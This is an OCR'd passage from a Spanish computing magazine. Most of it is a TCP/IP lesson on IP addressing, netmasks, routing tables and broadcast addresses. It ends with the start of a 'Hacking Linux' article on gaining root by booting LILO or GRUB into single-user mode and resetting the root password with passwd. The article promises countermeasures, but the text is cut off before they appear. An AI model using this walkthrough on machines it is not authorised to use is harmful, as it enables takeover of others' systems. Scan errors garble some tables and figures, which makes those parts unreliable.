Dirección 1P = 192.168.2.15 
Máscara de red = 255.255.255.0 


Estoy seguro de que esto ya os suena 
bastante más.* 


Quizá os preguntéis ahora por qué es tan 
habitual escribir las máscaras de red en 
este formato binario, que es menos 
intuitivo que el anterior. El motivo es que 
la máscara de red sirve para realizar 
determinadas operaciones de aritmética 
binaria que han de ser realizadas viendo 
la máscara de red en su formato binario. 
Y... qué operaciones son esas y para qué 
sirven? Eso es precisamente lo que 
veremos en el próximo punto. Y 


4. EL ENCAMINAMIENTO EN 
REDES TCP/IP 


Vamos a descubrir al fin cómo se puede 
encontrar el camino entre dos de las 
millones de máquinas conectadas 
“caóticamente” a Internet. 
Comprenderemos así la necesidad de la 
existencia de las máscaras de red, y la 
utilidad de su representación binaria. 


Para ello, vamos a ver un ejemplo de 
cómo se establecen diversas conexiones 
desde un PC de una empresa. El ejemplo 
que te presento ha sido intencionadamente 
muy muy “simplificado”, pero nos servirá 
perfectamente para lo que deseamos 
explicar. 


En nuestro ejemplo tenemos una red 

corporativa compuesta de dos subredes: 
» una zona interna, donde están los 
PCs de cada empleado 
> una zona DMZ donde se encuentra 
el servidor web de la compañía (se 
sale del tema hablar sobre lo que es 
una DMZ, y realmente no necesitáis 
saberlo para este ejemplo, pero al final 
del artículo aclararé por encima estos 
conceptos). 
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> Dos oficinas: 

> una en Madrid: esta es la oficina 
principal, en la que estamos 
nosotros, y está conectada a 
Internet a través de un modem 
ADSL 

> otra en Barcelona (una sucursal) 
Las oficinas están unidas entre si 
mediante una red directa. Lo hemos 
hecho así para simplificar el ejemplo 
9 


INTERNET k 


Router Central 


OFICINA 
BARCELONA > 


192.168.2.5 


172.16.1.23 


RED DMZ 


y 


Veamos en primer lugar qué ocurre si 
queremos enviar un correo electrónico 
directamente desde la oficina de Madrid 
a una máquina de la oficina de 
Barcelona. 


Nosotros estamos en la oficina de 
Madrid, frente a un PC de la RED 
INTERNA. Concretando, el ordenador 
en el que estamos nosotros tiene la 
dirección de red 192.168.2.5/24 (fíjate 
en la imagen). 


El router central, que intercomunica 
todas las redes de la empresa, tiene 
como dirección de red 192.168.2.1/24 
dentro de la red interna (fíjate en la 
imagen). 
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El ordenador de la oficina de Barcelona 
tiene como dirección de red 
172.16.1.23/12. 


Ésta es la configuración TCP/IP de nuestro 
ordenador en Madrid: 

Dirección IP: 192.168.2.5 

Máscara de red: 255.255.255.0 
Puerta de enlace predeterminada: 
192.168.2.1 


> Ya sabemos lo que significan los dos 
primeros parámetros (Dirección IP y 
Máscara de Red). 

> El último parámetro (Puerta de Enlace 
Predeterminada) quiere decir que todo 
paquete que no sepamos encaminar 
lo tendremos que enviar a esa dirección 
que, en nuestro caso, es la del router 
central. 


Por tanto, para enviar el email a la oficina 
de Barcelona (1P 172.16.1.23), el 
primer paso será pasar la pelota a la 
puerta de enlace predeterminada 
(192.168.2.1), es decir, al router 
central. 


Una vez en el router central, éste tendrá 
que decidir qué hacer con el “paquete”. 
Para ello tiene que mirar en las tablas 
que tiene configuradas, que son las 
siguientes: 


Dirección de red Máscara de red Interfaz 


192.168.1.0 255.255.255.0 


EthO 


172.16.0.0 


255.240.0.0 


Eth1 


192.168.2.0 


255.255.255.0 


Eth2 


0.0.0.0 


0.0.0.0 


Ppp0 


Veamos el significado de esta interesante 
tabla. Gracias a esta tabla, el router sabe: 


>» que cualquier paquete que coincida 
con la dirección de red 
192.168.1.0/24 tiene que ser dirigido 
al interfaz ethO 
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b que cualquier paquete que coincida 
con la dirección de red 
172.16.0.0/12 debe ser dirigido al 
interfaz ethi1 

b que cualquier paquete que coincida 
con la dirección de red 
192.168.2.0/24 se enviará al interfaz 
eth2 

> y, por último, que cualquier paquete 
que no coincida con ninguna de las 
anteriores direcciones de red, tendrá 
que coincidir por narices con la 
dirección de red 0.0.0.0/0, por lo 
que irá al interfaz pppoO. 


Por tanto, el interfaz pppO será para el 
router central el equivalente a la puerta 
de enlace predeterminada, donde van 
todos los paquetes que no se sabe cómo 
encaminar. Normalmente, estos paquetes 
serán los que vayan a Internet y, de 
hecho, el interfaz pppO estará conectado 
a un modem que conectará con Internet. 


¿No os suena eso de los interfaces etho0, 

ethi1, etc? Para que os hagáis una idea, 

serían como diferentes tarjetas de red: 
> Un router tendrá una tarjeta de red 
por cada red a la que esté conectado. 
> En cada tarjeta, por supuesto, habrá 
un cable que lo unirá con cada red, 
por eso es necesaria la tabla, para 
saber por qué cable tiene que enviar 
cada paquete según su destino. 
> El interfaz pppo0 es otro tipo de interfaz 
que no corresponde a una tarjeta de 
red, si no a una conexión PPP. Para 
no liaros, basta con que os quedéis con 
la idea de que el interfaz PPP es una 
interfaz con un modem. + 


Como cada tarjeta de red tiene una 
dirección IP asociada, el router tendrá 
por tanto 3 direcciones IP diferentes, 
una por cada interfaz eth (mira la 


imagen siguiente mientras lees las 

siguientes líneas): 
> El router tendrá la dirección IP 
192.168.1.1 en el interfaz etho0. Esta 
es la red donde tenemos la DMZ. 
> El router tendrá la dirección IP 
172.16.0.2 en el interfaz ethi1. Esta 
es la red donde tenemos el ordenador 
de Barcelona. 
> El router tendrá la dirección IP 
192.168.2.1 en el interfaz eth2. Esta 
es la red donde tenemos nuestro PC 
(Red Interna). 


De esta forma, se podrá acceder al router 
central desde las tres redes de la 
organización (la red interna, la red DMZ, 
y la red de la oficina de Barcelona), ya 
que tendrá una IP diferente para cada 
una de estas redes. 


Esta es una de las bases para comprender 
el trabajo de un router. Un router es como 
una araña que tiene una pata en cada 
red que desea enrutar. Un router nunca 
podrá enrutar (dirigir) una red a la que 
no pertenezca. 


0 E 00001010. 01001000 . 10000011 01001000 . 10000011 
Dirección de Host de Host 


a de Red 
Marca de Clase A 


Y ahora viene lo realmente 

interesante: 
> Nosotros estamos intentando enviar 
un “paquete” desde nuestro PC con la 
IP 192.168.2.5 al un PC de la oficina 
de Barcelona con la IP 172.16.1.23 
> El router solo sabe la IP de origen 
(192.168.2.5) y la IP de destino 
(172.16.1.23). ¿Cómo sabe el router 
a partir de la dirección IP del 
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paquete a qué cable debe 
enviarlo? Es aquí donde llega la 
importancia de las direcciones de 
red. 


Para comprenderlo tenemos que conocer 
un poquitín de la aritmética binaria más 
básica. Simplemente tenemos que 
comprender el funcionamiento del 
operador lógico AND. 


Igual que en la aritmética decimal de 
toda la vida existen una serie de 
operaciones como son la suma, la resta, 
la multiplicación, etc; en aritmética binaria 
existen, además de estas operaciones, 
otro grupo de operaciones llamadas 


operaciones lógicas. 


Las operaciones lógicas permiten operar 
sobre cifras binarias haciendo “preguntas” 
sobre ellas. Una respuesta SI se 
consideraría un 1, y una respuesta NO 
se consideraría un O. 


Una de las operaciones lógicas más 
básicas es la operación AND (traducido 
literalmente, la operación “y”). 


Por ejemplo, si tenemos dos variables 
binarias, A y B, donde cada una de ellas 
puede valer cero o uno, podemos 
preguntar: ¿están a uno A Y B? Si la 
respuesta es SI, el resultado será un 1. 
Si la respuesta es NO, el resultado será 
un O. Esto nos da lugar a la siguiente 
tabla: 


Para comprenderlo 


mejor, 
compararemos esta operación con 
otra operación lógica, que es la 
operación OR (traducido, la operación 
“o”). En este caso la pregunta es destá 
a uno A O B? Esta sería la tabla resultante: 


AORB 


e i-jololp 


B 
0 0 
1 
0 
1 


1 
1 
1 


Por tanto, la operación AND nos 
devolverá 1 sólo cuando ambas 
variables valgan 1. 
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La operación que nos interesa ahora es 
la operación AND, es la que permitirá a 
nuestro router comparar cada dirección 
de red con la dirección IP de destino de 
nuestro paquete. 


Recordamos que la IP de destino del 
paquete era 172.16.1.23. En este caso 
el router no sabe la máscara de red, ya 
que en un paquete IP sólo se envía la 
dirección IP, pero no la máscara de red. 


Por tanto, tenemos tan sólo una dirección, 
pero no sabemos cuál es la longitud de 
su “prefijo”. Al no conocer la longitud de 
este “prefijo”, es decir, la dirección de 
red, no sabremos a priori a qué red 
pertenece esta dirección IP. 


La única información de la que dispone 
el router central es la tabla que vimos 
anteriormente, por lo que el router tendrá 
que comparar esta información con la 
dirección IP del paquete. La comparación 
que hace es sencilla: 
> realiza una operación AND entre la 
IP del paquete y cada una de las 
máscaras de red que tenga en su 
tabla 
> si el resultado después de la operación 
AND es alguna de las direcciones de 
red que hay en la tabla, entonces el 
paquete será dirigido al cable 
correspondiente a esa dirección de red 
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> en caso de que ninguna dirección 
de red coincida con la del paquete, 
éste se enviará a la puerta de enlace 
predeterminada, en el interfaz pppo. 


Vamos ahora con la segunda máscara de 
red: 


10101100. 00010000 . 00000001 . 00010111 


Veamos esto paso por paso. AND 
En primer lugar, pasemos a binario la IP 


11111111. 11110000. 00000000 . 00000000 
del paquete, 172.16.1.23: EE Óá<—=>”*.. AIIIITO 


10101100. 00010000 . 00000000 . 00000000 = 172.16.0.0 
10101100. 00010000 . 00000001 . 00010111 


Tenemos que comprobar ahora que el 
resultado (172.16.0.0) coincida con la 
segunda dirección de red, que es 
172.16.0.0. En este caso sí que coincide, 
por lo que el router ha encontrado ya la 
red a la que ha de enviar el paquete. 
Consulta entonces su tabla y ve que ese 
paquete ha de ser enviado al interfaz 
eth1. Por tanto, ubicará físicamente el 


Y también las direcciones de red de la 
tabla del router: 


192.168.1.0 = 11000000 . 10101000 . 00000001 . 00000000 
Máscara = 11111111. 11111111. 11111111.00000000 


172.16.0.0 = 10101100. 00010000 . 00000000 . 00000000 
Máscara = 11111111.11110000 . 00000000 . 00000000 


192.168.2.0 = 11000000 . 10101000 . 00000010 . 00000000 


Máscara =11111111.11111111.11111111.00000000 paquete peraltable conectado a la tarieta 
0.0.0.0 =00000000.00000000 . 00000000 . 00000000 de red ethi, y podrá llegar así hasta la 
Máscara  =00000000 . 00000000 . 00000000 . 00000000 red de la oficina de Barcelona, donde 


probablemente otro router se encargue 
de terminar de encaminar el paquete ya 
dentro de esa red. 


Empezamos realizando la operación AND 
entre la IP del paquete y la primera de 
las máscaras: 


Si ahora queremos enviar otro paquete 

cuyo destino sea la IP 217.155.1.13, 

que es una IP de Internet, nuestro router 
comparará de nuevo las direcciones de 

red: 

217.155.1.13 AND 255.255.255.0 = 217,155.1.0-> no coincidecon 192.168.1.0 
217.155,1.13 AND 255.240.0.0 = 217.144,0.0 -> no coincide con 172.16.0.0 
217.155.1.13 AND 255.255.255.0 = 217,155.1.0-> no coincidecon 192.168.2.0 
217.155.1.13 AND 0.0.0.0 = 0.0.0.0 -> SI coincide con 0.0.0.0 


10101100. 00010000 . 00000001 . 00010111 


AND 


11111111. 11111111. 11111111 .00000000 


10101100. 00010000 . 00000001 . 00000000 = 172.16.1.0 
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Tenemos que comprobar ahora si 
172.16.1.0 es igual a 192.168.1.0, que 
es la dirección de red correspondiente 
a la primera de las máscaras, con la que 
acabamos de realizar el AND. Por 
supuesto, no son iguales, por lo que el 
paquete no pertenece a esta primera 
red. 


Por tanto, este paquete será enviado al 
interfaz PPPO, que es el que nos conecta 
con Internet a través del modem. 


Como vemos, es fácil realizar la operación 
AND en formato decimal cuando la 
máscara de red divide la dirección en 
bytes (es decir, la máscara sólo tiene 255 
o 0). En este caso, bastará con poner a 
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O aquellos bytes de la IP en los que 
haya un O en la máscara de red 
(217.155.1.13 AND 255.255.255.0 = 
217.155.1.0). En cambio, para otro tipo 
de máscaras, ya es necesario operar en 
binario (217.155.1.13 AND 255.240.0.0 
= 217.144.0.0). 


Como este último ejemplo no se ve de 
forma clara en formato decimal, lo 
muestro aquí en su formato binario: 


11011001 . 10011011 . 00000001 . 00001101 
AND 


11111111. 11110000. 00000000 . 00000000 


11011001 . 10010000 . 00000000 . 00000000 = 217.144.0.0 


5. CLASES DE REDES 


Existen tres tipos básicos de redes en 
función de la dirección de red (el famoso 
“prefijo”). 


Cada clase de red se utilizará para un fin 
distinto. Por ejemplo, una red de clase 
A se utilizará para grandes organizaciones, 
y sólo existen 124 direcciones para redes 
de este tipo. 


En cambio, una red de clase C se utiliza 
en pequeñas organizaciones, y existen 
más de 2 millones de direcciones de clase 
C. 


Pero vamos a ver en detalle en qué 
consiste cada una de las clases de redes. 


5.1. CLASE A 


Las redes de clase A son aquellas que 
tienen una máscara de red /8 
(255.0.0.0), es decir, sólo los 8 primeros 
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bits se utilizan para diferenciar la red, y 
los otros 24 bits se utilizan para identificar 
a una máquina concreta dentro de la red. 


Además, el primer bit de una dirección 
de red de clase A tiene que ser 0, por lo 
que en realidad sólo nos quedan 7 bits 
para identificar unívocamente una red de 
clase A. 


Teniendo en cuenta que hay además 
algunas direcciones reservadas, esto da 
lugar a que sólo existen 124 redes de 
clase A en Internet. Estas son las que 
tienen desde la dirección 1.*.*.* hasta 
la dirección 126.*,*,* 


Si bien son pocas las diferentes redes de 
clase A que se pueden direccionar con 
sólo 7 bits, en cambio, son muchísimas 
las máquinas que se pueden direccionar 
dentro de esa red, ya que serían 224 
que son casi 17 millones de máquinas. 


0 E 00001010 . 01001000 . 10000011 01001000 . 10000011 
Dirección de Host de Host 


a de Red 
Marca de Clase A 


5.2. CLASE B 


Las redes de clase B tienen una máscara 
de red /16 (255.255.0.0), es decir, la 
mitad de la dirección de red especifica la 
red, y la otra mitad la máquina dentro de 
la red. 


Los dos primeros bits de la dirección 
de red han de ser 10, por lo que al final 
nos quedan “sólo” 14 bits para identificar 
la red. Esto da lugar a que haya 16382 
direcciones de red de clase B diferentes, 
que abarcan desde la 128.1.*.* hasta la 
191.254.*,* 
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Cada red de clase B puede direccionar 
65534 máquinas diferentes, por lo que 
estas redes siguen siendo utilizadas tan 
sólo por grandes organizaciones. 


10 001000 . 00001010 . 01001000 . 10000011 


Dirección de Red 


Dirección de Host 


Marca de Clase B 


5.3. CLASE C 


Las redes de clase C tienen una máscara 
de red /24 (255.255.255.0), por lo 
que sólo los últimos 8 bits de la dirección 
permiten especificar una máquina dentro 
de la red. 


Los 3 primeros bits de una dirección 
de clase C tienen que ser 110, por lo 
que al final nos quedan “sólo” 21 bits 
para direccionar la red, lo cual da lugar 
a que haya más de 2 millones de redes 
de clase C diferentes. 


Dentro de cada red de clase C se pueden 
direccionar 254 máquinas diferentes, por 
lo que estas redes ya no son válidas para 
grandes organizaciones. 


Las redes de clase C abarcan desde la 


Dentro de las diferentes redes destacan 
las llamadas clase D y clase E, muy poco 
utilizadas: 
b Las de clase D, utilizadas para 
multicast, son las que empiezan por 
1110. 
> Las de clase E, direcciones para uso 
experimental, son las comprendidas 
entre 240.0.0.0 y 247.255.255.255. 


No debemos asustarnos si encontramos direcciones de red 
con máscaras de red como esta: 255.255.255.128. Las 
máscaras de red no siempre están construidas con 255 o 0, 
es decir, las direcciones de red no constan siempre de un 
número entero de bytes. Por ejemplo, la máscara de red 
255.255.255.128 sería en binario: 


11111111 . 11111111. 11111111. 10000000 


Con este número en binario ya podemos operar con la 
operación lógica AND exactamente igual a como lo 
hacíamos con las máscaras más "clásicas". Ya vimos un 
ejemplo de este tipo de máscaras en el punto anterior 
(255.240.0.0). 


5.5. DIRECCIONES DE RED 
RESERVADAS 


192.0.1.* hasta la 223.255.254.*. . . 
Hay algunas direcciones de red reservadas 


para ciertos fines, y que no pueden ser 
asignadas a ninguna máquina de Internet. 


110 01000 . 00001010. 01001000 . 10000011 


E 


Dirección de Red , ] 
La más conocida es el famoso localhost: 


127.0.0.1. 

Esta dirección siempre se refiere a tu 
propia máquina (tu PC), por lo que 
cualquier acceso que hagas a esa IP serán 
accesos a tu propio ordenador. 


Marca de Clase € 
Dirección de Host 


5.4. OTRAS CLASES DE REDES 


Aparte de las 3 clases básicas, pueden 
existir redes con diferentes máscaras que 
no se ajusten necesariamente a una de 
estas 3 clases. 


La dirección de red 10.0.0.0/8 (es decir, 
todas las IPs entre 10.0.0.0 y 
10.255.255.255) están reservadas para 
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redes de área local de gran caia, 
ya que permiten direccionar 2? 
máquinas. 


También para redes de área local se 
usan las direcciones 172.16.0.0/12 (es 
decir, desde la IP 172.16.0.0 hasta la 
172.31.255.255), y las 192.168.0.0/16 
(desde la IP 192.168.0.0 hasta la 
192.168.255.255). Estos rangos de IPs 
son los que podemos utilizar nosotros 
cuando montamos una red en nuestra 
casa o en la oficina. 


Por tanto, cualquiera en su casa es libre 
de hacer lo que quiera con esos rangos 
de IPs, ya que tienen garantizado que 
no existe en Internet ninguna máquina 
con esas direcciones. En el próximo punto 
veremos con más detalle (aunque 
tampoco demasiado, pues no es 
realmente el tema del artículo) el 
funcionamiento de una red local. 


Existen otras direcciones reservadas para 
otros fines, como las 128.0.*,*, 
191.255.*,*, 223.255.255.*, etc. 


6. FUNCIONAMIENTO 


BÁSICO DE UNA RED LOCAL 


Para terminar, vamos a intentar aclarar 
algunos conceptos que he utilizado a lo 
largo del artículo, concretamente en el 
punto 4, en el que he hablado del 
encaminamiento. 


En primer lugar, tengo que dejar claro 
que el tema del encaminamiento es 
mucho más complicado de lo que he 
mostrado aquí, pero explicarlo en detalle 
se salía por completo del tema del artículo. 


Espero disponer de un poco más de 
tiempo en breve (quizá para el próximo 
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mes), y acompañar el curso de TCP/IP 
de un nuevo número de la serie RAW en 
el que explique algunos protocolos de 
encaminamiento, como RIP u OSPF. 


Lo que queda por aclarar entonces es el 
funcionamiento básico de una red local. 


Una red local es una red independiente 
de Internet que, en el caso de que esté 
conectada a Internet, lo hará 
(normalmente) únicamente a través de 
un sólo punto. Por muchos ordenadores 
que haya conectados dentro de la red 
local, todos se conectarán con el exterior 
(Internet) mediante un único punto. 


Al conectar con el exterior a través de 
un sólo punto, se consigue que el tamaño 
y la configuración de la red local sea 
transparente para los usuarios del exterior, 
es decir, para Internet. Si alguien desde 
“la china” intentase ver nuestra Red 
Interna compuesta por 600 ordenadores 
(o 2 0 3000, los que sean), únicamente 
vería una IP PÚBLICA, es decir, un único 
punto de acceso. Esta IP seguramente 
correspondería a la del modem que da 
acceso a Internet a todos nuestros 
ordenadores. 


Esto es lo que permite que una empresa, 
una universidad, oO cualquier otra 
organización, pueda tener un gran número 
de ordenadores, sin que cada uno de ellos 
tenga que tener su propia dirección IP 
dentro de Internet, lo cual saturaría 
inútilmente el rango de direcciones IP 
disponibles para Internet. 


Por supuesto, una red local no da ventajas 
sólo de cara al exterior, para evitar la 
saturación de las direcciones de Internet, 
si no también de cara al interior, para 
independizar la red de la empresa de la 
red Internet. 
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El tener una red independiente tiene 
muchas ventajas de seguridad, de 
velocidad, etc. Una red local típica, como 
la que podrías tener tú en tu casa por 
muy poco dinero, tiene una velocidad de 
100Mbps. Esta velocidad dista mucho de 
las velocidades de que disponemos en 
casa para acceder a Internet. Por tanto, 
el tener una red local nos permitirá tener 
una gran velocidad de conexión entre los 
ordenadores de nuestra casa, empresa, 
u organización de cualquier tipo, sin 
depender de la velocidad de acceso o 
incluso de la saturación del tráfico de 
Internet. 


Por otro lado, las ventajas con respecto 
a la seguridad son evidentes, ya que el 
tráfico de la red local se puede aislar 
totalmente de Internet si se desea, 
evitando así cualquier tipo de ataque o 
de espionaje. 


En muchas organizaciones se opta por 
una configuración local dividida en dos 
redes. Una de ellas, comunmente llamada 
zona interna, será la que utilicen los 
usuarios comunes (por ejemplo, los 
empleados de una empresa), y tendrá 
un acceso a Internet totalmente limitado. 


Esto hace que sea muy difícil que un 
hacker realice cualquier tipo de ataque 
o espionaje contra los ordenadores de 
los empleados (al mismo tiempo, también 
permite limitar el acceso a los empleados, 
para que no pasen el tiempo chateando 
o viendo fotos guarrillas). 


Por supuesto, la empresa no puede 
funcionar sólo con una conexión tan 
restringida como ésta, ya que necesitará 
tener una serie de servidores (servidor 
web, servidor de correo, etc) que tengan 
un acceso mucho más abierto hacia 
Internet. Por eso se crea otra zona, 


llamada comunmente zona 
desmilitarizada, O DMZ, en la cual se 
alojarán todos los servidores, y aquellas 
máquinas que no hayan de estar bajo la 
protección de la zona interna. 


INTERNET 


RED DMZ 


RED INTERNA < 


Servidor Web Servidor Correo 


Empleados 


Al ser independiente de Internet, en una 
red local se pueden utilizar direcciones 
IP libremente, siempre y cuando sean 
direcciones reservadas que no existan en 
Internet. Ya mencioné antes cuales son 
las direcciones IP reservadas para redes 
locales. 


Una gran ventaja de esto es que facilita 
mucho la configuración de los ordenadores 
conectados a la red local, ya que existen 
protocolos, de los cuales el más famoso 
es el DHCP (Dynamic Host Configuration 
Protocol), que permiten configurar 
automáticamente cualquier nuevo 
ordenador que se conecte a la red local. 
Cada vez que se conecta una máquina, 
ésta pide al servidor DHCP los datos de 
su configuración (como su dirección IP), 
y queda así automáticamente configurado. 


PC PASO A PASO N* 24 


CURSO DE TCP/IP - LA CAPA IP - LAS DIRECCIONES IP - CURSO DE T 


Esto puede dar lugar a la existencia de 
IPs dinámicas, que ya mencioné al 
principio del artículo. Según una serie de 
criterios, el servidor DHCP podrá decidir 
en un momento dado asignar a una 
máquina una dirección IP diferente a la 
que le asignó la última vez que esta 
máquina se conectó. 


En una red local no sólo será necesario 
un protocolo que facilite la configuración 
automática de cada equipo, si no que 
hará falta también otro protocolo que 
permita a los diferentes equipos de la 
red conocerse entre sí, es decir, saber 
qué dirección IP tiene no sólo él mismo, 
si no también sus compañeros a los que 
quiera acceder. 


El protocolo más conocido para este fin 
es el ARP (Address Resolution Protocol), 
que permite asociar direcciones IP con 
direcciones MAC, tal y como veremos 
en el curso más adelante, cuando 
hablemos del nivel de enlace. 


Por último, sólo me queda mencionar el 


funcionamiento de las direcciones 


broadcast, de las cuales ya hablé un 
poco a lo largo del curso de TCP/IP. 


Por si no lo recordáis, una dirección 
broadcast es una dirección IP especial 
que se refiere no a una sola máquina, si 
no a todas las máquinas de una 
misma red. 


Si, por ejemplo, enviamos un ping a una 
dirección IP, recibiremos respuesta 
únicamente de una máquina. En cambio, 
si esa dirección IP es la dirección 
broadcast de la red, todas las máquinas 
que estén conectadas a la red en ese 
momento responderán a nuestro ping 
(con los consiguientes problemas de 
seguridad de los que ya hablé en artículos 
anteriores). 
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Para simplificar, dije que una dirección 
broadcast se formaba poniendo un 255 
en el último byte de la IP, pero esto no 
es del todo cierto, ya que éste es sólo el 
caso más común. 


Para comprender la formación de la 
dirección broadcast tenemos que volver 
al tema de los operadores lógicos binarios, 
por lo que voy a introducir un nuevo 
operador, el más simple de todos, que es 
el operador NOT. 


El operador NOT lo único que hace es 
invertir todos los bits del número 
binario, es decir, cambiar todos los ceros 
por unos, y todos los unos por ceros. 
Así: 

NOT 1001110101 = 0110001010 


El primer paso para obtener la dirección 
broadcast de una red, será aplicar el 
operador NOT sobre la máscara de red. 
Es decir, si tenemos la red 
172.16.0.0/12, ésta será la máscara de 
red en formato binario: 


11111111.11110000. 00000000 . 00000000 


Y ésta será la máscara despues de aplicar 
el operador NOT: 


00000000 . 00001111. 11111111.11111111 


Teniendo ya esta máscara invertida, sólo 
tenemos que aplicar un operador OR 
entre la máscara invertida y la 
dirección de red. Os recuerdo aquí cual 
era el funcionamiento del operador OR: 


B AORB 


0 


1 


1 


e=[ofolol|y 


=joj=|o 


1 


Por tanto, si la dirección de red en nuestro 
ejemplo es: 
172.16.0.0 = 10101100 .00010000 . 00000000. 00000000 


Página 33 


CURSO DE TCP/IP - LA CAPA IP - LAS DIRECCIONES IP - CURSO DE 


Realizamos la operación: 


10101100. 00010000 . 00000000 . 00000000 


OR 


00000000 . 00001111. 11111111. 11111111 


10101100.00011111. 11111111. 11111111 = 172.31.255.255 


Por tanto, la dirección broadcast para la 
red 172.16.0.0/12 será 172.31.255.255. 


En el próximo número, continuaremos 
con la capa IP de la pila TCP/TP, pero esta 
vez entrando de lleno en el formato de 
las cabeceras IP, por lo que nos esperará 
un artículo denso y, espero que bastante 
interesante. + 

Autor: PyC (LCo). 
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APRECIACIONES: 
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tu número de Cliente Preferente y justificante/factura de la subscripción. 
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> Veremos los gestores de arranque Lilo y Grub. 
> Aprenderemos los distintos tipos de RUNLEVELS de Linux 
> Hackimg de Lmux. conseguiremos ser root. 


> Y. por supuesto, pondremos contramedidas a este ataque. 


Lo primero mi enhorabuena a los lectores 
de la revista y miembros del foro, ya que 
con su esfuerzo y constancia hay cada 
vez mas gente interesada en este mundo 
tan apasionante. 


Sin más preámbulo que lo anteriormente 
mencionado, vamos al tema: 


Todos sabemos que Linux es un sistema 
robusto, estable y muy fiable. Esto se 
debe entre otras muchas cosas a que es 
un sistema multiusuario Y multitarea, de 
ahí su potencia como servidor de 
cualquier tipo de cosa. 


También hemos oído hablar mucho de la 
seguridad en Linux, que si es mayor y 
mejor que en “guindows”, que es mas 
eficaz y casi “irrompible”... Pero como en 
todo, hay fallos de seguridad. 


Sabemos de sobra que nuestro amigo 
“Bill el puertas” y su sistema (Windows) 
son los campeones en 
vulnerabilidades? y, como la mayoría 
de la gente conoce gran parte de esos 
fallos, pensé entonces en un articulo 
basado en Linux, con la principal 
diferencia de que dependemos de 
nosotros mismos para configurarlo de 
manera segura (cosa que con su rival 
de pago es imposible). De ahí que Linux 
sea para mi un sistema mas seguro y 
eficaz, entre otras muchas, muchas, 
muchas cosas. 
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Los sistemas linux están dotados (o 
podemos hacer que lo estén) de un gestor 
de arranque. Este gestor de arranque 
puede ser configurado de diversas formas, 
por ejemplo para que tengamos diferentes 
sistemas operativos, para añadir ciertas 
ordenes o comandos en función de lo que 
queramos, etc. 


En este artículo nos vamos a centrar en 
dos gestores de arranque: Lilo y Grub. 


CONSIGUIENDO ACCESO COMO 


ROOT _EN SISTEMAS LINUX 


CON GESTOR DE ARRANQUE 
LILO 


El primer ejemplo de ataque buscando al 
root lo haremos con Lilo. Si tenemos 
instalado LINUX en nuestro PC y tenemos 
como gestor de arranque LILO, al iniciar 
el PC nos encontramos con esta pantalla: 


Ol uandrake Linux 
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Aquí debemos ser rápidos y pulsar las A al modo de usuario único. 
flechas ya sea para arriba o para abajo, — MM 
con esto dejará el tiempo de andar, y 


podremos pensar si presión 


Ahora pulsamos ESC y entramos en esta 
otra pantalla. 


linux-nonfb failsafe floppy 


como root. Ahora lo que tenemos que 
hacer es ponernos una password, para 
que cuando entremos en Linux en modo 
normal, accedamos al sistema completo 
como root!!!! 


Aquí es donde podemos pasarle AR A 
parámetros a nuestro gestor de arranque rara pone! 


(en este caso Lilo), y tenemos que poner: 

linux 1 o linux single, en función de la Para poner una password en linux, debemos de poner el 
r 

configuración. comando 

+ passwd (nombre de usuario), en este caso, como ya 


O rarisaro estamos como root, solo tenemos que poner + passwd. 


¿Linux 1 Nos preguntará y ponemos el password que queramos. 


Al poner esto, la maquina empezara a 
arrancar, y nos llevara a un sitio como 
este: 
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Una vez puesta la password al root 
podemos comprobar con un sencillo 
comando que somos el ** Dios” ” (root) 
de esa maquina Linux. El comando es 
H id y veremos algo como esto: 


Grub (639K lower /32307Zk upper memory) 


Linux 


Windows Xp Profesional 


Usa las flechas arriba o abajo para elegir lo que quiera arrancar. 
Pulsa Intro para arrancar el S.Operativo elegido, 'e' para editar 
los comandos antes de arrancar, o 'c' para poder introducir comandos. 


Ya solo nos queda reiniciar y entrar de 
manera normal, pero como root del 
sistema Y 


Con esto hemos visto nuestro primer 
ataque, pero aun no sabemos por qué 
pasa esto. Y sobre todo no sabemos como 
remediarlo... poco a poco Y 


CONSIGUIENDO ACCESO 
COMO ROOT EN SISTEMAS 
LINUX CON GESTOR DE 


ARRANQUE GRUB 


Ahora nos centraremos en el que para 
mí es el mejor gestor de arranque de 
Linux: el Grub. Este gestor de arranque, 
lo primero que nos muestra cuando 
arrancamos el PC son los sistemas 
operativos instalados y las opciones: 
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Lo que a nosotros nos interesa es 
seleccionar con las flechas Linux, y 
después pulsar “e” para poder editar. Al 
pulsar salimos a un sitio como este: 


Grub (639K lower /32307Zk upper memory) 


root (hda0,5) 


kernel /boot/vmlinuz-2.4.22 root=dev/hda6 hdc=ide-scsi 


Pulsa 'b' para arrancar, 'e' para editar el comando seleccionado, 
'c' para disponer de comandos, 'o' para atadir una nueva linea 
detras de la linea seleccionada ('0' para antes), 'd' para borrar 
la linea seleccionada, o escape para volver al menu principal. 


Aquí seleccionaremos la parte de la línea 
que comienza por kernel, que es la que 
vamos a modificar. Volvemos a pulsar “e” 
y llegamos a un lugar donde podemos 
escribir. 


Aquí escribiremos la palabra single al final 
de la línea (siempre la línea que comienza 
por kernel). 


[ Puedes hacer una edición de las lineas tipo BASH.Tambien TAB lista los 
posibles nombres de dispositivos y archivos. ESC sale en cualquier 
momento 1] 


srub edit> kernel /boot/vmlinuz-2.4.22 root=dew/hda6 hdc=ide-scsi sinsle 


Página 37 


Hacking Linux - Hacking Linux - Hacking Linux - Hacking Linux - H 


Tras escribir esto, pulsamos INTRO, y 
volvemos a la pantalla anterior, pero 
ahora nos pone la palabra single al final 
de la línea que comienza por kernel. 


Grub (639Kk lower /32307Zk upper memory) 


root (hdaD,5) 
kernel /boot/vmlinuz-2.4.22 root=dev/hda6 hdc=ide-scsi single 


Pulsa 'b' para arrancar, 'e 


* para editar el comando seleccionado, 


'c' para disponer de comandos, 'o' para azadir una nueva linea 
detras de la linea seleccionada ('0' para antes), 'd' para borrar 
la linea seleccionada, o escape para volver al menu principal. 
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Y ahora solo nos queda pulsar *b” para 
arrancar en modo single y tener una 
terminal con privilegios de root. Lo demás 
me lo ahorro, porque ya esta explicado 
en la parte anterior de Lilo. 


Tras conseguir nuestro ataque (tanto con 
LILO como con GRUB), es la hora de 
explicar el porqué pasa todo esto y, 
sobretodo, cómo poder proteger nuestros 
sistemas Linux de este ataque. 


ENTENDIENDO EL ATAQUE Y 


PROTEGIENDO NUESTRO 


LINUX 


En todos los sistemas Linux del tipo 
System V (por ejemplo Suse, Mandrake, 
Red Hat y similares) hay en su 
configuración diferentes tipos de ejecución 
O arranque. A estos tipo de ejecución se 
les llaman RUNLEVELS. 


Estos runlevels son los que se encargan 
de arrancar el sistema, pero dependiendo 
del tipo de runlevels que sea, arrancará 
determinados procesos de servicios o 
